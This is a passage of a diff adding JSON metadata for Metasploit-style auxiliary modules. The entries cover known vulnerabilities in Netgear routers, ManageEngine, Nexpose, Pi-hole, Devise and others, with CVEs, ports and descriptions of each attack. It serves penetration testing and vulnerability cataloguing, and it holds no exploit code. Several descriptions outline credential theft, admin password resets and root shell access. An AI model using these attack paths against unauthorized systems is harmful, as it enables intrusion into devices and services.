"Linux,Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/mantisbt_password_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/mantisbt_password_reset", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/mutiny_frontend_read_delete": { + "name": "Mutiny 5 Arbitrary File Read and Delete", + "fullname": "auxiliary/admin/http/mutiny_frontend_read_delete", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-05-15", + "type": "auxiliary", + "author": [ + "juan vazquez " + ], + "description": "This module exploits the EditDocument servlet from the frontend on the Mutiny 5\n appliance. The EditDocument servlet provides file operations, such as copy and\n delete, which are affected by a directory traversal vulnerability. Because of this,\n any authenticated frontend user can read and delete arbitrary files from the system\n with root privileges. In order to exploit the vulnerability a valid user (any role)\n in the web frontend is required. The module has been tested successfully on the\n Mutiny 5.0-1.07 appliance.", + "references": [ + "CVE-2013-0136", + "US-CERT-VU-701572", + "URL-http://web.archive.org/web/20250114041839/https://www.rapid7.com/blog/post/2013/05/15/new-1day-exploits-mutiny-vulnerabilities/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb", + "is_install_path": true, + "ref_name": "admin/http/mutiny_frontend_read_delete", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Delete", + "description": "Delete arbitrary file" + }, + { + "name": "Read", + "description": "Read arbitrary file" + } + ] + }, + "auxiliary_admin/http/netflow_file_download": { + "name": "ManageEngine NetFlow Analyzer Arbitrary File Download", + "fullname": "auxiliary/admin/http/netflow_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-11-30", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits an arbitrary file download vulnerability in CSVServlet\n on ManageEngine NetFlow Analyzer. This module has been tested on both Windows\n and Linux with versions 8.6 to 10.2. Note that when typing Windows paths, you\n must escape the backslash with a backslash.", + "references": [ + "CVE-2014-5445", + "OSVDB-115340", + "URL-https://seclists.org/fulldisclosure/2014/Dec/9", + "URL-https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netflow_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/netflow_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_auth_download": { + "name": "NETGEAR ProSafe Network Management System 300 Authenticated File Download", + "fullname": "auxiliary/admin/http/netgear_auth_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-02-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has a file download vulnerability that can be exploited by an\n authenticated remote attacker to download any file in the system.\n This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.", + "references": [ + "CVE-2016-1524", + "US-CERT-VU-777024", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", + "URL-https://seclists.org/fulldisclosure/2016/Feb/30" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netgear_auth_download.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_auth_download", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_pnpx_getsharefolderlist_auth_bypass": { + "name": "Netgear PNPX_GetShareFolderList Authentication Bypass", + "fullname": "auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-09-06", + "type": "auxiliary", + "author": [ + "Unknown", + "Grant Willcox" + ], + "description": "This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers\n running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows\n unauthenticated attackers to reveal the password for the admin user that is used to log into the\n router's administrative portal, in plaintext.\n\n Once the password has been been obtained, the exploit enables telnet on the target router and then utiltizes\n the auxiliary/scanner/telnet/telnet_login module to log into the router using the stolen credentials of the\n admin user. This will result in the attacker obtaining a new telnet session as the \"root\" user.\n\n This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.", + "references": [ + "URL-https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133", + "URL-https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "RelatedModules": [ + "exploit/linux/telnet/netgear_telnetenable" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_r6700_pass_reset": { + "name": "Netgear R6700v3 Unauthenticated LAN Admin Password Reset", + "fullname": "auxiliary/admin/http/netgear_r6700_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-06-15", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro ", + "Radek Domanski ", + "gwillcox-r7" + ], + "description": "This module targets ZDI-20-704 (aka CVE-2020-10924), a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd),\n on Netgear R6700v3 routers running firmware versions from V1.0.2.62 up to but not including V1.0.4.94, to reset\n the password for the 'admin' user back to its factory default of 'password'. Authentication is bypassed by\n using ZDI-20-703 (aka CVE-2020-10923), an authentication bypass that occurs when network adjacent\n computers send SOAPAction UPnP messages to a vulnerable Netgear R6700v3 router. Currently this module only\n supports exploiting Netgear R6700v3 routers running either the V1.0.0.4.82_10.0.57 or V1.0.0.4.84_10.0.58\n firmware, however support for other firmware versions may be added in the future.\n\n Once the password has been reset, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a\n special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can\n then log into this telnet server using the new password, and obtain a shell as the \"root\" user.\n\n These last two steps have to be done manually, as the authors did not reverse the communication with the web interface.\n It should be noted that successful exploitation will result in the upnpd binary crashing on the target router.\n As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit\n this vulnerability once per reboot of the router.\n\n This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +\n Radek Domanski).", + "references": [ + "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md", + "URL-https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders", + "CVE-2020-10923", + "CVE-2020-10924", + "ZDI-20-703", + "ZDI-20-704" + ], + "platform": "", + "arch": "", + "rport": 5000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_r6700_pass_reset", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "config-changes" + ], + "Stability": [ + "crash-service-down" + ], + "Reliability": [], + "RelatedModules": [ + "exploit/linux/telnet/netgear_telnetenable" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_r7000_backup_cgi_heap_overflow_rce": { + "name": "Netgear R7000 backup.cgi Heap Overflow RCE", + "fullname": "auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-04-21", + "type": "auxiliary", + "author": [ + "colorlight2019", + "SSD Disclosure", + "Grant Willcox (tekwizz123)" + ], + "description": "This module exploits a heap buffer overflow in the genie.cgi?backup.cgi\n page of Netgear R7000 routers running firmware version 1.0.11.116.\n Successful exploitation results in unauthenticated attackers gaining\n code execution as the root user.\n\n The exploit utilizes these privileges to enable the telnet server\n which allows attackers to connect to the target and execute commands\n as the admin user from within a BusyBox shell. Users can connect to\n this telnet server by running the command \"telnet *target IP*\".", + "references": [ + "URL-https://ssd-disclosure.com/ssd-advisory-netgear-nighthawk-r7000-httpd-preauth-rce/", + "CVE-2021-31802" + ], + "platform": "Linux", + "arch": "armle", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/netgear_r7000_backup_cgi_heap_overflow_rce.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_r7000_backup_cgi_heap_overflow_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_soap_password_extractor": { + "name": "Netgear Unauthenticated SOAP Password Extractor", + "fullname": "auxiliary/admin/http/netgear_soap_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-02-11", + "type": "auxiliary", + "author": [ + "Peter Adkins ", + "Michael Messner ", + "h00die " + ], + "description": "This module exploits an authentication bypass vulnerability in different Netgear devices.\n It allows to extract the password for the remote management interface. This module has been\n tested on a Netgear WNDR3700v4 - V1.0.1.42, but other devices are reported as vulnerable:\n NetGear WNDR3700v4 - V1.0.0.4SH, NetGear WNDR3700v4 - V1.0.1.52, NetGear WNR2200 - V1.0.1.88,\n NetGear WNR2500 - V1.0.0.24, NetGear WNDR3700v2 - V1.0.1.14 (Tested by Paula Thomas),\n NetGear WNDR3700v1 - V1.0.16.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR3700v1 - V1.0.7.98 (Tested by Michal Bartoszkiewicz),\n NetGear WNDR4300 - V1.0.1.60 (Tested by Ronny Lindner),\n NetGear R6300v2 - V1.0.3.8 (Tested by Robert Mueller),\n NetGear WNDR3300 - V1.0.45 (Tested by Robert Mueller),\n NetGear WNDR3800 - V1.0.0.48 (Tested by an Anonymous contributor),\n NetGear WNR1000v2 - V1.0.1.1 (Tested by Jimi Sebree),\n NetGear WNR1000v2 - V1.1.2.58 (Tested by Chris Boulton),\n NetGear WNR2000v3 - v1.1.2.10 (Tested by h00die)", + "references": [ + "BID-72640", + "OSVDB-118316", + "URL-https://github.com/darkarnium/secpub/tree/master/Vulnerabilities/NetGear/SOAPWNDR" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netgear_soap_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_soap_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/netgear_wnr2000_pass_recovery": { + "name": "NETGEAR WNR2000v5 Administrator Password Recovery", + "fullname": "auxiliary/admin/http/netgear_wnr2000_pass_recovery", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-12-20", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.\n This vulnerability can be exploited by an unauthenticated attacker who is able to guess\n the value of a certain timestamp which is in the configuration of the router.\n Brute forcing the timestamp token might take a few minutes, a few hours, or days, but\n it is guaranteed that it can be bruteforced.\n This module works very reliably and it has been tested with the WNR2000v5, firmware versions\n 1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this\n has not been tested.", + "references": [ + "CVE-2016-10175", + "CVE-2016-10176", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt", + "URL-https://seclists.org/fulldisclosure/2016/Dec/72", + "URL-https://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb", + "is_install_path": true, + "ref_name": "admin/http/netgear_wnr2000_pass_recovery", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/nexpose_xxe_file_read": { + "name": "Nexpose XXE Arbitrary File Read", + "fullname": "auxiliary/admin/http/nexpose_xxe_file_read", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Brandon Perry ", + "Drazen Popovic ", + "Bojan Zdrnja " + ], + "description": "Nexpose v5.7.2 and prior is vulnerable to a XML External Entity attack via a number\n of vectors. This vulnerability can allow an attacker to a craft special XML that\n could read arbitrary files from the filesystem. This module exploits the\n vulnerability via the XML API.", + "references": [ + "URL-http://web.archive.org/web/20230402081629/https://www.rapid7.com/blog/post/2013/08/16/r7-vuln-2013-07-24/" + ], + "platform": "", + "arch": "", + "rport": 3780, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb", + "is_install_path": true, + "ref_name": "admin/http/nexpose_xxe_file_read", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/novell_file_reporter_filedelete": { + "name": "Novell File Reporter Agent Arbitrary File Delete", + "fullname": "auxiliary/admin/http/novell_file_reporter_filedelete", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Luigi Auriemma", + "juan vazquez " + ], + "description": "NFRAgent.exe in Novell File Reporter allows remote attackers to delete\n arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and\n CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on\n Windows platforms.", + "references": [ + "CVE-2011-2750", + "OSVDB-73729", + "URL-http://aluigi.org/adv/nfr_2-adv.txt" + ], + "platform": "", + "arch": "", + "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb", + "is_install_path": true, + "ref_name": "admin/http/novell_file_reporter_filedelete", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/nuuo_nvrmini_reset": { + "name": "NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset", + "fullname": "auxiliary/admin/http/nuuo_nvrmini_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-08-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable\n to an administrator password reset on the exposed web management interface.\n Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware\n (before v1.7.6), otherwise you need an administrative user password.\n This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.\n It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested\n in those devices.", + "references": [ + "CVE-2016-5676", + "US-CERT-VU-856152", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-nvr-vulns.txt", + "URL-https://seclists.org/bugtraq/2016/Aug/45" + ], + "platform": "", + "arch": "", + "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/nuuo_nvrmini_reset", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/openbravo_xxe": { + "name": "Openbravo ERP XXE Arbitrary File Read", + "fullname": "auxiliary/admin/http/openbravo_xxe", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-30", + "type": "auxiliary", + "author": [ + "Brandon Perry " + ], + "description": "The Openbravo ERP XML API expands external entities which can be defined as\n local files. This allows the user to read any files from the FS as the\n user Openbravo is running as (generally not root).\n\n This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6.", + "references": [ + "CVE-2013-3617", + "OSVDB-99141", + "BID-63431", + "URL-https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/openbravo_xxe.rb", + "is_install_path": true, + "ref_name": "admin/http/openbravo_xxe", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/pfadmin_set_protected_alias": { + "name": "Postfixadmin Protected Alias Deletion Vulnerability", + "fullname": "auxiliary/admin/http/pfadmin_set_protected_alias", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-02-03", + "type": "auxiliary", + "author": [ + "Jan-Frederik Rieckers" + ], + "description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias", + "references": [ + "CVE-2017-5930", + "URL-https://github.com/postfixadmin/postfixadmin/pull/23", + "BID-96142" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb", + "is_install_path": true, + "ref_name": "admin/http/pfadmin_set_protected_alias", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/pihole_domains_api_exec": { + "name": "Pi-Hole Top Domains API Authenticated Exec", + "fullname": "auxiliary/admin/http/pihole_domains_api_exec", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-08-04", + "type": "auxiliary", + "author": [ + "h00die", + "SchneiderSec" + ], + "description": "This exploits a command execution in Pi-Hole Web Interface <= 5.5.\n The Settings > API/Web inetrace page contains the field\n Top Domains/Top Advertisers which is validated by a regex which does not properly\n filter system commands, which can then be executed by calling the gravity\n functionality. However, the regex only allows a-z, 0-9, _.", + "references": [ + "URL-https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-5cm9-6p3m-v259", + "CVE-2021-32706" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-03 19:50:04 +0000", + "path": "/modules/auxiliary/admin/http/pihole_domains_api_exec.rb", + "is_install_path": true, + "ref_name": "admin/http/pihole_domains_api_exec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/rails_devise_pass_reset": { + "name": "Ruby on Rails Devise Authentication Password Reset", + "fullname": "auxiliary/admin/http/rails_devise_pass_reset", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-28", + "type": "auxiliary", + "author": [ + "joernchen", + "jjarmoc" + ], + "description": "The Devise authentication gem for Ruby on Rails is vulnerable\n to a password reset exploit leveraging type confusion. By submitting XML\n to rails, we can influence the type used for the reset_password_token\n parameter. This allows for resetting passwords of arbitrary accounts,\n knowing only the associated email address.\n\n This module defaults to the most common devise URIs and response values,\n but these may require adjustment for implementations which customize them.\n\n Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database\n except PostgreSQL or SQLite3. Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails\n 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation\n of this vulnerability, by quoting numeric values when comparing them with\n non numeric values.", + "references": [ + "CVE-2013-0233", + "OSVDB-89642", + "BID-57577", + "URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/", + "URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html", + "URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8", + "URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb", + "is_install_path": true, + "ref_name": "admin/http/rails_devise_pass_reset", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/scadabr_credential_dump": { + "name": "ScadaBR Credentials Dumper", + "fullname": "auxiliary/admin/http/scadabr_credential_dump", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-05-28", + "type": "auxiliary", + "author": [ + "bcoles " + ], + "description": "This module retrieves credentials from ScadaBR, including\n service credentials and unsalted SHA1 password hashes for\n all users, by invoking the `EmportDwr.createExportData` DWR\n method of Mango M2M which is exposed to all authenticated\n users regardless of privilege level.\n\n This module has been tested successfully with ScadaBR\n versions 1.0 CE and 0.9 on Windows and Ubuntu systems.", + "references": [], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2021-02-22 15:51:02 +0000", + "path": "/modules/auxiliary/admin/http/scadabr_credential_dump.rb", + "is_install_path": true, + "ref_name": "admin/http/scadabr_credential_dump", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/scrutinizer_add_user": { + "name": "Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass", + "fullname": "auxiliary/admin/http/scrutinizer_add_user", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-07-27", + "type": "auxiliary", + "author": [ + "MC ", + "Jonathan Claudius", + "Tanya Secker", + "sinn3r " + ], + "description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.", + "references": [ + "CVE-2012-2626", + "OSVDB-84318", + "URL-http://web.archive.org/web/20130827051639/https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb", + "is_install_path": true, + "ref_name": "admin/http/scrutinizer_add_user", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sophos_wpa_traversal": { + "name": "Sophos Web Protection Appliance patience.cgi Directory Traversal", + "fullname": "auxiliary/admin/http/sophos_wpa_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-04-03", + "type": "auxiliary", + "author": [ + "Wolfgang Ettlingers", + "juan vazquez " + ], + "description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.", + "references": [ + "CVE-2013-2641", + "OSVDB-91953", + "BID-58833", + "EDB-24932", + "URL-https://web.archive.org/web/20130603041204/http://www.sophos.com/en-us/support/knowledgebase/118969.aspx", + "URL-https://web.archive.org/web/20140701204340/https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20130403-0_Sophos_Web_Protection_Appliance_Multiple_Vulnerabilities.txt" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb", + "is_install_path": true, + "ref_name": "admin/http/sophos_wpa_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/supra_smart_cloud_tv_rfi": { + "name": "Supra Smart Cloud TV Remote File Inclusion", + "fullname": "auxiliary/admin/http/supra_smart_cloud_tv_rfi", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-06-03", + "type": "auxiliary", + "author": [ + "Dhiraj Mishra", + "wvu " + ], + "description": "This module exploits an unauthenticated remote file inclusion which\n exists in Supra Smart Cloud TV. The media control for the device doesn't\n have any session management or authentication. Leveraging this, an\n attacker on the local network can send a crafted request to broadcast a\n fake video.", + "references": [ + "CVE-2019-12477", + "URL-https://www.inputzero.io/2019/06/hacking-smart-tv.html" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb", + "is_install_path": true, + "ref_name": "admin/http/supra_smart_cloud_tv_rfi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/sysaid_admin_acct": { + "name": "SysAid Help Desk Administrator Account Creation", + "fullname": "auxiliary/admin/http/sysaid_admin_acct", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-06-03", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. This module has been tested on SysAid 14.4 in Windows and Linux.", + "references": [ + 